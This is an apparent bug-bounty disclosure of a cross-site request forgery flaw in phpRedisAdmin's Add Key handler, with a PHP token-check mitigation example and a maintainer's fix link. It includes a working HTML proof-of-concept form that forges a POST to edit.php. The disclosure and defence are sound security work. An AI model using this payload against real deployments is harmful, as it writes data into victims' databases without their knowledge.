Cross-Site Request Forgery (CSRF) in erikdubbelboer/phpredisadmin
Valid
Reported on Aug 23rd 2021
✍️ Description
The Add Key functionality in the application is vulnerable to a CSRF attack: the POST handler in edit.php accepts the form submission shown below without any anti-CSRF token, so a page under an attacker's control can submit it on behalf of a logged-in user.
🕵️♂️ Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://domain.tld/phpRedisAdmin/edit.php?view&s=1&d=0&key=testkey1" method="POST">
<input type="hidden" name="type" value="string" />
<input type="hidden" name="key" value="testkey13" />
<input type="hidden" name="hkey" value="" />
<input type="hidden" name="index" value="" />
<input type="hidden" name="score" value="" />
<input type="hidden" name="value" value="testval1" />
<input type="hidden" name="oldvalue" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
This vulnerability can let an attacker add data to the database without the knowledge or interaction of the user.
📍 Location
index.php#L1
📝 References
Cross-site request forgery (CSRF)
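The standard mitigation for this class of bug is a synchronizer token: the server binds a random token to the session, renders it into every state-changing form, and rejects a POST whose token does not match. The following is an added illustration, not phpRedisAdmin's own code or its fix commit; it assumes a PHP session and the same form fields as the proof of concept above.

```php
<?php
// Added example (not phpRedisAdmin's own code): synchronizer-token check for a
// state-changing POST handler such as the Add Key form in edit.php.
// Assumption: PHP 7.3+ sessions, and the form fields from the proof of concept.

// Defence in depth: a SameSite session cookie is not sent on cross-site POSTs,
// so a forged form on another origin arrives without the victim's session.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Issue one random token per session and render it into every state-changing form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Accept the request only if the submitted token matches the session token.
// hash_equals() compares in constant time, so the check leaks no timing signal.
function csrf_check(array $post): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        // A cross-site form like the PoC above has no way to learn the token.
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // Only past this point should the key/value from $_POST be written to Redis.
}
?>
<form action="edit.php?view&s=1&d=0" method="POST">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="hidden" name="type" value="string">
  <input type="text" name="key">
  <input type="text" name="value">
  <input type="submit" value="Save">
</form>
```

When reviewing a fix, the check to make is that every state-changing endpoint (not only the Add Key form) verifies the token before touching the database.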
Melbin Mathew Antony modified the report
2 years ago
We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back
2 years ago
An erikdubbelboer/phpredisadmin maintainer commented
2 years ago
Fixed in https://github.com/erikdubbelboer/phpRedisAdmin/commit/b9039adbb264c81333328faa9575ecf8e0d2be94
Hi, please mark the vulnerability as validated and fixed. Thanks
The fix bounty has been dropped
This vulnerability will not receive a CVE